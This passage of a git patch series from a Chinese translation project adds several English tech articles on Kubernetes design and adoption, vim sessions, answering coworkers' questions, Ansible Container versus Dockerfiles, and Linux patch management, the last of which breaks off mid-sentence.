memory leak in your controller manager. Because the controller manager is stateless, you can just periodically restart it every hour or something and feel confident that you won’t cause any consistency issues. Or we ran into a bug in the scheduler where it would sometimes just forget about pods and never schedule them. You can sort of mitigate this just by restarting the scheduler every 10 minutes. (we didn’t do that, we fixed the bug instead, but you  _could_  :) ) + +So I feel like I can trust Kubernetes’ design to help make sure the state in the cluster is consistent even when there are bugs in its core components. And in general I think the software is generally improving over time. The only stateful thing you have to operate is etcd + +Not to harp on this “state” thing too much but – I think it’s cool that in Kubernetes the only thing you have to come up with backup/restore plans for is etcd (unless you use persistent volumes for your pods). I think it makes kubernetes operations a lot easier to think about. + +### Implementing new distributed systems on top of Kubernetes is relatively easy + +Suppose you want to implement a distributed cron job scheduling system! Doing that from scratch is a ton of work. But implementing a distributed cron job scheduling system inside Kubernetes is much easier! (still not trivial, it’s still a distributed system) + +The first time I read the code for the Kubernetes cronjob controller I was really delighted by how simple it was. Here, go read it! The main logic is like 400 lines of Go. Go ahead, read it! => [cronjob_controller.go][4] <= + +Basically what the cronjob controller does is: + +* Every 10 seconds: + * Lists all the cronjobs that exist + + * Checks if any of them need to run right now + + * If so, creates a new Job object to be scheduled & actually run by other Kubernetes controllers + + * Clean up finished jobs + + * Repeat + +The Kubernetes model is pretty constrained (it has this pattern of resources are defined in etcd, controllers read those resources and update etcd), and I think having this relatively opinionated/constrained model makes it easier to develop your own distributed systems inside the Kubernetes framework. + +Kamal introduced me to this idea of “Kubernetes is a good platform for writing your own distributed systems” instead of just “Kubernetes is a distributed system you can use” and I think it’s really interesting. He has a prototype of a [system to run an HTTP service for every branch you push to github][5]. It took him a weekend and is like 800 lines of Go, which I thought was impressive! + +### Kubernetes lets you do some amazing things (but isn’t easy) + +I started out by saying “kubernetes lets you do these magical things, you can just spin up so much infrastructure with a single configuration file, it’s amazing”. And that’s true! + +What I mean by “Kubernetes isn’t easy” is that Kubernetes has a lot of moving parts learning how to successfully operate a highly available Kubernetes cluster is a lot of work. Like I find that with a lot of the abstractions it gives me, I need to understand what is underneath those abstractions in order to debug issues and configure things properly. I love learning new things so this doesn’t make me angry or anything, I just think it’s important to know :) + +One specific example of “I can’t just rely on the abstractions” that I’ve struggled with is that I needed to learn a LOT [about how networking works on Linux][6] to feel confident with setting up Kubernetes networking, way more than I’d ever had to learn about networking before. This was very fun but pretty time consuming. I might write more about what is hard/interesting about setting up Kubernetes networking at some point. + +Or I wrote a [2000 word blog post][7] about everything I had to learn about Kubernetes’ different options for certificate authorities to be able to set up my Kubernetes CAs successfully. + +I think some of these managed Kubernetes systems like GKE (google’s kubernetes product) may be simpler since they make a lot of decisions for you but I haven’t tried any of them. + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/10/05/reasons-kubernetes-is-cool/ + +作者:[ Julia Evans][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/kamalmarhubi/kubereview +[2]:https://jvns.ca/categories/kubernetes +[3]:https://github.com/kelseyhightower/kubernetes-the-hard-way +[4]:https://github.com/kubernetes/kubernetes/blob/e4551d50e57c089aab6f67333412d3ca64bc09ae/pkg/controller/cronjob/cronjob_controller.go +[5]:https://github.com/kamalmarhubi/kubereview +[6]:https://jvns.ca/blog/2016/12/22/container-networking/ +[7]:https://jvns.ca/blog/2017/08/05/how-kubernetes-certificates-work/ From faf6c54a3b5c3833d24e97a476ffa38e215bf496 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:29:44 +0800 Subject: [PATCH 0186/1627] =?UTF-8?q?20171203-20=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170910 Cool vim feature sessions.md | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 sources/tech/20170910 Cool vim feature sessions.md diff --git a/sources/tech/20170910 Cool vim feature sessions.md b/sources/tech/20170910 Cool vim feature sessions.md new file mode 100644 index 0000000000..8c0506e086 --- /dev/null +++ b/sources/tech/20170910 Cool vim feature sessions.md @@ -0,0 +1,44 @@ +Cool vim feature: sessions! +============================================================• + +Yesterday I learned about an awesome vim feature while working on my [vimrc][5]! (to add fzf & ripgrep search plugins mainly). It’s a builtin feature, no fancy plugins needed. + +So I drew a comic about it. + +Basically you can save all your open files and current state with + +``` +:mksession ~/.vim/sessions/foo.vim + +``` + +and then later restore it with either `:source ~/.vim/sessions/foo.vim` or `vim -S ~/.vim/sessions/foo.vim`. Super cool! + +Some vim plugins that add extra features to vim sessions: + +* [https://github.com/tpope/vim-obsession][1] + +* [https://github.com/mhinz/vim-startify][2] + +* [https://github.com/xolox/vim-session][3] + +Here’s the comic: + +![](https://jvns.ca/images/vimsessions.png) + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/09/10/vim-sessions/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://github.com/tpope/vim-obsession +[2]:https://github.com/mhinz/vim-startify +[3]:https://github.com/xolox/vim-session +[4]:https://jvns.ca/categories/vim +[5]:https://github.com/jvns/vimconfig/blob/master/vimrc From 82b925f3cda96476e297a2c10bc98d68d5026cb2 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:31:25 +0800 Subject: [PATCH 0187/1627] =?UTF-8?q?20171203-22=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ow to answer questions in a helpful way.md | 172 ++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100644 sources/tech/20170921 How to answer questions in a helpful way.md diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md new file mode 100644 index 0000000000..8a3601ed06 --- /dev/null +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -0,0 +1,172 @@ +How to answer questions in a helpful way +============================================================ + +Your coworker asks you a slightly unclear question. How do you answer? I think asking questions is a skill (see [How to ask good questions][1]) and that answering questions in a helpful way is also a skill! Both of them are super useful. + +To start out with – sometimes the people asking you questions don’t respect your time, and that sucks. I’m assuming here throughout that that’s not what happening – we’re going to assume that the person asking you questions is a reasonable person who is trying their best to figure something out and that you want to help them out. Everyone I work with is like that and so that’s the world I live in :) + +Here are a few strategies for answering questions in a helpful way! + +### If they’re not asking clearly, help them clarify + +Often beginners don’t ask clear questions, or ask questions that don’t have the necessary information to answer the questions. Here are some strategies you can use to help them clarify. + +* **Rephrase a more specific question** back at them (“Are you asking X?”) + +* **Ask them for more specific information** they didn’t provide (“are you using IPv6?”) + +* **Ask what prompted their question**. For example, sometimes people come into my team’s channel with questions about how our service discovery works. Usually this is because they’re trying to set up/reconfigure a service. In that case it’s helpful to ask “which service are you working with? Can I see the pull request you’re working on?” + +A lot of these strategies come from the [how to ask good questions][2] post. (though I would never say to someone “oh you need to read this Document On How To Ask Good Questions before asking me a question”) + +### Figure out what they know already + +Before answering a question, it’s very useful to know what the person knows already! + +Harold Treen gave me a great example of this: + +> Someone asked me the other day to explain “Redux Sagas”. Rather than dive in and say “They are like worker threads that listen for actions and let you update the store!”  +> I started figuring out how much they knew about Redux, actions, the store and all these other fundamental concepts. From there it was easier to explain the concept that ties those other concepts together. + +Figuring out what your question-asker knows already is important because they may be confused about fundamental concepts (“What’s Redux?”), or they may be an expert who’s getting at a subtle corner case. An answer building on concepts they don’t know is confusing, and an answer that recaps things they know is tedious. + +One useful trick for asking what people know – instead of “Do you know X?”, maybe try “How familiar are you with X?”. + +### Point them to the documentation + +“RTFM” is the classic unhelpful answer to a question, but pointing someone to a specific piece of documentation can actually be really helpful! When I’m asking a question, I’d honestly rather be pointed to documentation that actually answers my question, because it’s likely to answer other questions I have too. + +I think it’s important here to make sure you’re linking to documentation that actually answers the question, or at least check in afterwards to make sure it helped. Otherwise you can end up with this (pretty common) situation: + +* Ali: How do I do X? + +* Jada: + +* Ali: That doesn’t actually explain how to X, it only explains Y! + +If the documentation I’m linking to is very long, I like to point out the specific part of the documentation I’m talking about. The [bash man page][3] is 44,000 words (really!), so just saying “it’s in the bash man page” is not that helpful :) + +### Point them to a useful search + +Often I find things at work by searching for some Specific Keyword that I know will find me the answer. That keyword might not be obvious to a beginner! So saying “this is the search I’d use to find the answer to that question” can be useful. Again, check in afterwards to make sure the search actually gets them the answer they need :) + +### Write new documentation + +People often come and ask my team the same questions over and over again. This is obviously not the fault of the people (how should  _they_  know that 10 people have asked this already, or what the answer is?). So we’re trying to, instead of answering the questions directly, + +1. Immediately write documentation + +2. Point the person to the new documentation we just wrote + +3. Celebrate! + +Writing documentation sometimes takes more time than just answering the question, but it’s often worth it! Writing documentation is especially worth it if: + +a. It’s a question which is being asked again and again b. The answer doesn’t change too much over time (if the answer changes every week or month, the documentation will just get out of date and be frustrating) + +### Explain what you did + +As a beginner to a subject, it’s really frustrating to have an exchange like this: + +* New person: “hey how do you do X?” + +* More Experienced Person: “I did it, it is done.” + +* New person: ….. but what did you DO?! + +If the person asking you is trying to learn how things work, it’s helpful to: + +* Walk them through how to accomplish a task instead of doing it yourself + +* Tell them the steps for how you got the answer you gave them! + +This might take longer than doing it yourself, but it’s a learning opportunity for the person who asked, so that they’ll be better equipped to solve such problems in the future. + +Then you can have WAY better exchanges, like this: + +* New person: “I’m seeing errors on the site, what’s happening?” + +* More Experienced Person: (2 minutes later) “oh that’s because there’s a database failover happening” + +* New person: how did you know that??!?!? + +* More Experienced Person: “Here’s what I did!”: + 1. Often these errors are due to Service Y being down. I looked at $PLACE and it said Service Y was up. So that wasn’t it. + + 2. Then I looked at dashboard X, and this part of that dashboard showed there was a database failover happening. + + 3. Then I looked in the logs for the service and it showed errors connecting to the database, here’s what those errors look like. + +If you’re explaining how you debugged a problem, it’s useful both to explain how you found out what the problem was, and how you found out what the problem wasn’t. While it might feel good to look like you knew the answer right off the top of your head, it feels even better to help someone improve at learning and diagnosis, and understand the resources available. + +### Solve the underlying problem + +This one is a bit tricky. Sometimes people think they’ve got the right path to a solution, and they just need one more piece of information to implement that solution. But they might not be quite on the right path! For example: + +* George: I’m doing X, and I got this error, how do I fix it + +* Jasminda: Are you actually trying to do Y? If so, you shouldn’t do X, you should do Z instead + +* George: Oh, you’re right!!! Thank you! I will do Z instead. + +Jasminda didn’t answer George’s question at all! Instead she guessed that George didn’t actually want to be doing X, and she was right. That is helpful! + +It’s possible to come off as condescending here though, like + +* George: I’m doing X, and I got this error, how do I fix it? + +* Jasminda: Don’t do that, you’re trying to do Y and you should do Z to accomplish that instead. + +* George: Well, I am not trying to do Y, I actually want to do X because REASONS. How do I do X? + +So don’t be condescending, and keep in mind that some questioners might be attached to the steps they’ve taken so far! It might be appropriate to answer both the question they asked and the one they should have asked: “Well, if you want to do X then you might try this, but if you’re trying to solve problem Y with that, you might have better luck doing this other thing, and here’s why that’ll work better”. + +### Ask “Did that answer your question?” + +I always like to check in after I  _think_  I’ve answered the question and ask “did that answer your question? Do you have more questions?”. + +It’s good to pause and wait after asking this because often people need a minute or two to know whether or not they’ve figured out the answer. I especially find this extra “did this answer your questions?” step helpful after writing documentation! Often when writing documentation about something I know well I’ll leave out something very important without realizing it. + +### Offer to pair program/chat in real life + +I work remote, so many of my conversations at work are text-based. I think of that as the default mode of communication. + +Today, we live in a world of easy video conferencing & screensharing! At work I can at any time click a button and immediately be in a video call/screensharing session with someone. Some problems are easier to talk about using your voices! + +For example, recently someone was asking about capacity planning/autoscaling for their service. I could tell there were a few things we needed to clear up but I wasn’t exactly sure what they were yet. We got on a quick video call and 5 minutes later we’d answered all their questions. + +I think especially if someone is really stuck on how to get started on a task, pair programming for a few minutes can really help, and it can be a lot more efficient than email/instant messaging. + +### Don’t act surprised + +This one’s a rule from the Recurse Center: [no feigning surprise][4]. Here’s a relatively common scenario + +* Human 1: “what’s the Linux kernel?” + +* Human 2: “you don’t know what the LINUX KERNEL is?!!!!?!!!???” + +Human 2’s reaction (regardless of whether they’re  _actually_  surprised or not) is not very helpful. It mostly just serves to make Human 1 feel bad that they don’t know what the Linux kernel is. + +I’ve worked on actually pretending not to be surprised even when I actually am a bit surprised the person doesn’t know the thing and it’s awesome. + +### Answering questions well is awesome + +Obviously not all these strategies are appropriate all the time, but hopefully you will find some of them helpful! I find taking the time to answer questions and teach people can be really rewarding. + +Special thanks to Josh Triplett for suggesting this post and making many helpful additions, and to Harold Treen, Vaibhav Sagar, Peter Bhat Harkins, Wesley Aptekar-Cassels, and Paul Gowder for reading/commenting. + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/answer-questions-well/ + +作者:[ Julia Evans][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/about +[1]:https://jvns.ca/blog/good-questions/ +[2]:https://jvns.ca/blog/good-questions/ +[3]:https://linux.die.net/man/1/bash +[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ From 8ff377fd749f4147e523832fc8fa1eb46aee1f72 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:34:24 +0800 Subject: [PATCH 0188/1627] =?UTF-8?q?20171203-23=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Linux containers with Ansible Container.md | 114 ++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 sources/tech/20171005 How to manage Linux containers with Ansible Container.md diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md new file mode 100644 index 0000000000..897b793a86 --- /dev/null +++ b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -0,0 +1,114 @@ +How to manage Linux containers with Ansible Container +============================================================ + +### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. + +![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") +Image by : opensource.com + +I love containers and use the technology every day. Even so, containers aren't perfect. Over the past couple of months, however, a set of projects has emerged that addresses some of the problems I've experienced. + +I started using containers with [Docker][11], since this project made the technology so popular. Aside from using the container engine, I learned how to use **[docker-compose][6]** and started managing my projects with it. My productivity skyrocketed! One command to run my project, no matter how complex it was. I was so happy. + +After some time, I started noticing issues. The most apparent were related to the process of creating container images. The Docker tool uses a custom file format as a recipe to produce container images—Dockerfiles. This format is easy to learn, and after a short time you are ready to produce container images on your own. The problems arise once you want to master best practices or have complex scenarios in mind. + +More on Ansible + +* [How Ansible works][1] + +* [Free Ansible eBooks][2] + +* [Ansible quick start video][3] + +* [Download and install Ansible][4] + +Let's take a break and travel to a different land: the world of [Ansible][22]. You know it? It's awesome, right? You don't? Well, it's time to learn something new. Ansible is a project that allows you to manage your infrastructure by writing tasks and executing them inside environments of your choice. No need to install and set up any services; everything can easily run from your laptop. Many people already embrace Ansible. + +Imagine this scenario: You invested in Ansible, you wrote plenty of Ansible roles and playbooks that you use to manage your infrastructure, and you are thinking about investing in containers. What should you do? Start writing container image definitions via shell scripts and Dockerfiles? That doesn't sound right. + +Some people from the Ansible development team asked this question and realized that those same Ansible roles and playbooks that people wrote and use daily can also be used to produce container images. But not just that—they can be used to manage the complete lifecycle of containerized projects. From these ideas, the [Ansible Container][12] project was born. It utilizes existing Ansible roles that can be turned into container images and can even be used for the complete application lifecycle, from build to deploy in production. + +Let's talk about the problems I mentioned regarding best practices in context of Dockerfiles. A word of warning: This is going to be very specific and technical. Here are the top three issues I have: + +### 1\. Shell scripts embedded in Dockerfiles. + +When writing Dockerfiles, you can specify a script that will be interpreted via **/bin/sh -c**. It can be something like: + +``` +RUN dnf install -y nginx +``` + +where RUN is a Dockerfile instruction and the rest are its arguments (which are passed to shell). But imagine a more complex scenario: + +``` +RUN set -eux; \ +    \ +# this "case" statement is generated via "update.sh" +    %%ARCH-CASE%%; \ +    \ +    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ +    wget -O go.tgz "$url"; \ +    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ +``` + +This one is taken from [the official golang image][13]. It doesn't look pretty, right? + +### 2\. You can't parse Dockerfiles easily. + +Dockerfiles are a new format without a formal specification. This is tricky if you need to process Dockerfiles in your infrastructure (e.g., automate the build process a bit). The only specification is [the code][14] that is part of **dockerd**. The problem is that you can't use it as a library. The easiest solution is to write a parser on your own and hope for the best. Wouldn't it be better to use some well-known markup language, such as YAML or JSON? + +### 3\. It's hard to control. + +If you are familiar with the internals of container images, you may know that every image is composed of layers. Once the container is created, the layers are stacked onto each other (like pancakes) using union filesystem technology. The problem is, that you cannot explicitly control this layering—you can't say, "here starts a new layer." You are forced to change your Dockerfile in a way that may hurt readability. The bigger problem is that a set of best practices has to be followed to achieve optimal results—newcomers have a really hard time here. + +### Comparing Ansible language and Dockerfiles + +The biggest shortcoming of Dockerfiles in comparison to Ansible is that Ansible, as a language, is much more powerful. For example, Dockerfiles have no direct concept of variables, whereas Ansible has a complete templating system (variables are just one of its features). Ansible contains a large number of modules that can be easily utilized, such as [**wait_for**][15], which can be used for service readiness checks—e.g., wait until a service is ready before proceeding. With Dockerfiles, everything is a shell script. So if you need to figure out service readiness, it has to be done with shell (or installed separately). The other problem with shell scripts is that, with growing complexity, maintenance becomes a burden. Plenty of people have already figured this out and turned those shell scripts into Ansible. + +If you are interested in this topic and would like to know more, please come to [Open Source Summit][16] in Prague to see [my presentation][17] on Monday, Oct. 23, at 4:20 p.m. in Palmovka room. + + _Learn more in Tomas Tomecek's talk, [From Dockerfiles to Ansible Container][7], at [Open Source Summit EU][8], which will be held October 23-26 in Prague._ + + + +### About the author + + [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - Engineer. Hacker. Speaker. Tinker. Red Hatter. Likes containers, linux, open source, python 3, rust, zsh, tmux.[More about me][9] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/10/dockerfiles-ansible-container + +作者:[Tomas Tomecek ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/tomastomecek +[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI +[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI +[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI +[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI +[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY +[6]:https://github.com/docker/compose +[7]:http://sched.co/BxIW +[8]:http://events.linuxfoundation.org/events/open-source-summit-europe +[9]:https://opensource.com/users/tomastomecek +[10]:https://opensource.com/user/175651/feed +[11]:https://opensource.com/tags/docker +[12]:https://www.ansible.com/ansible-container +[13]:https://github.com/docker-library/golang/blob/master/Dockerfile-debian.template#L14 +[14]:https://github.com/moby/moby/tree/master/builder/dockerfile +[15]:http://docs.ansible.com/wait_for_module.html +[16]:http://events.linuxfoundation.org/events/open-source-summit-europe +[17]:http://events.linuxfoundation.org/events/open-source-summit-europe/program/schedule +[18]:https://opensource.com/users/tomastomecek +[19]:https://opensource.com/users/tomastomecek +[20]:https://opensource.com/users/tomastomecek +[21]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201#comments +[22]:https://opensource.com/tags/ansible +[23]:https://opensource.com/tags/containers +[24]:https://opensource.com/tags/ansible +[25]:https://opensource.com/tags/docker +[26]:https://opensource.com/tags/open-source-summit From b044202569c43d2657c029d3bb4002e954864477 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:36:38 +0800 Subject: [PATCH 0189/1627] =?UTF-8?q?20171203-25=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171120 Adopting Kubernetes step by step.md | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 sources/tech/20171120 Adopting Kubernetes step by step.md diff --git a/sources/tech/20171120 Adopting Kubernetes step by step.md b/sources/tech/20171120 Adopting Kubernetes step by step.md new file mode 100644 index 0000000000..05faf304c8 --- /dev/null +++ b/sources/tech/20171120 Adopting Kubernetes step by step.md @@ -0,0 +1,93 @@ +Adopting Kubernetes step by step +============================================================ + +Why Docker and Kubernetes? + +Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion. + +Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner. + +[Docker][1] — the containerization platform — provides this, making software  _independent_  of cloud providers. + +However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent. + +This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes). + +A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move you shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play. + + +![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg) +Evolution to Kubernetes + +With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from  _development _ to  _production _ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure. + +The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline. + +How do you work with Kubernetes? + +With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information). + +So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way? + + +![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg) +Development with a local cluster + +If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4]. + +A Kubernetes series + +The Kubernetes series repository is open source and available here: + +### [https://github.com/red-gate/ks][5] + +We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database. + +The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs  _and_  have understood how best to cater for the database lifecycle in this world of containers and clusters. + +Here are the first 5 episodes of this series: + +1. ks1: build a React app with Kubernetes + +2. ks2: make minikube detect React code changes + +3. ks3: add a python web server that hosts an API + +4. ks4: make minikube detect Python code changes + +5. ks5: create a test environment + +The second part of the series will add a database and try to work out the best way to evolve our application alongside it. + +By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way. + +What’s next? + +We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes. + + _This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6] + +* * * + + _We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._ + +-------------------------------------------------------------------------------- + +via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe + +作者:[santiago arias][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.com/@santiaago?source=post_header_lockup +[1]:https://www.docker.com/what-docker +[2]:https://kubernetes.io/ +[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM +[4]:https://kubernetes.io/docs/concepts/storage/volumes/ +[5]:https://github.com/red-gate/ks +[6]:mailto:foundry@red-gate.com +[7]:https://www.red-gate.com/foundry/ +[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies +[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge From a25a01e35c7fd3d3ff2032639bde7f956b86f425 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:38:35 +0800 Subject: [PATCH 0190/1627] =?UTF-8?q?20171203-26=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171114 Sysadmin 101 Patch Management.md | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 sources/tech/20171114 Sysadmin 101 Patch Management.md diff --git a/sources/tech/20171114 Sysadmin 101 Patch Management.md b/sources/tech/20171114 Sysadmin 101 Patch Management.md new file mode 100644 index 0000000000..71df51258d --- /dev/null +++ b/sources/tech/20171114 Sysadmin 101 Patch Management.md @@ -0,0 +1,61 @@ +Sysadmin 101: Patch Management +============================================================ + +* [HOW-TOs][1] + +* [Servers][2] + +* [SysAdmin][3] + + +A few articles ago, I started a Sysadmin 101 series to pass down some fundamental knowledge about systems administration that the current generation of junior sysadmins, DevOps engineers or "full stack" developers might not learn otherwise. I had thought that I was done with the series, but then the WannaCry malware came out and exposed some of the poor patch management practices still in place in Windows networks. I imagine some readers that are still stuck in the Linux versus Windows wars of the 2000s might have even smiled with a sense of superiority when they heard about this outbreak. + +The reason I decided to revive my Sysadmin 101 series so soon is I realized that most Linux system administrators are no different from Windows sysadmins when it comes to patch management. Honestly, in some areas (in particular, uptime pride), some Linux sysadmins are even worse than Windows sysadmins regarding patch management. So in this article, I cover some of the fundamentals of patch management under Linux, including what a good patch management system looks like, the tools you will want to put in place and how the overall patching process should work. + +### What Is Patch Management? + +When I say patch management, I'm referring to the systems you have in place to update software already on a server. I'm not just talking about keeping up with the latest-and-greatest bleeding-edge version of a piece of software. Even more conservative distributions like Debian that stick with a particular version of software for its "stable" release still release frequent updates that patch bugs or security holes. + +Of course, if your organization decided to roll its own version of a particular piece of software, either because developers demanded the latest and greatest, you needed to fork the software to apply a custom change, or you just like giving yourself extra work, you now have a problem. Ideally you have put in a system that automatically packages up the custom version of the software for you in the same continuous integration system you use to build and package any other software, but many sysadmins still rely on the outdated method of packaging the software on their local machine based on (hopefully up to date) documentation on their wiki. In either case, you will need to confirm that your particular version has the security flaw, and if so, make sure that the new patch applies cleanly to your custom version. + +### What Good Patch Management Looks Like + +Patch management starts with knowing that there is a software update to begin with. First, for your core software, you should be subscribed to your Linux distribution's security mailing list, so you're notified immediately when there are security patches. If there you use any software that doesn't come from your distribution, you must find out how to be kept up to date on security patches for that software as well. When new security notifications come in, you should review the details so you understand how severe the security flaw is, whether you are affected and gauge a sense of how urgent the patch is. + +Some organizations have a purely manual patch management system. With such a system, when a security patch comes along, the sysadmin figures out which servers are running the software, generally by relying on memory and by logging in to servers and checking. Then the sysadmin uses the server's built-in package management tool to update the software with the latest from the distribution. Then the sysadmin moves on to the next server, and the next, until all of the servers are patched. + +There are many problems with manual patch management. First is the fact that it makes patching a laborious chore. The more work patching is, the more likely a sysadmin will put it off or skip doing it entirely. The second problem is that manual patch management relies too much on the sysadmin's ability to remember and recall all of the servers he or she is responsible for and keep track of which are patched and which aren't. This makes it easy for servers to be forgotten and sit 